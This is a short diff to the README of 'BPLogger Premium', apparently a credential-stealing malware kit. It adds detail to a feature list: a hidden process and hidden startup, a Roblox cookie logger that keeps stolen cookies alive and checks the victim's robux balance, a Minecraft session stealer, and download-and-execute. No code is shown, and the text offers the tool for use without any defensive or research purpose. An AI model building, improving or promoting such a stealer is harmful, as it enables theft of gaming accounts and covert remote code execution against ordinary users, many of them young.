BPLogger/BPLoggerPremium/README.md

 Hidden Process

-Hidden Startup
+Hidden Startup (Hidden)

-Roblox Cookie Logger
+Roblox Cookie Logger (Refreshes it, makes sure it does not die) (Checks robux amount automatically)

-Minecraft Session Stealer
+Minecraft Session Stealer (Refreshes it, makes sure it does not die)

 Download & Execute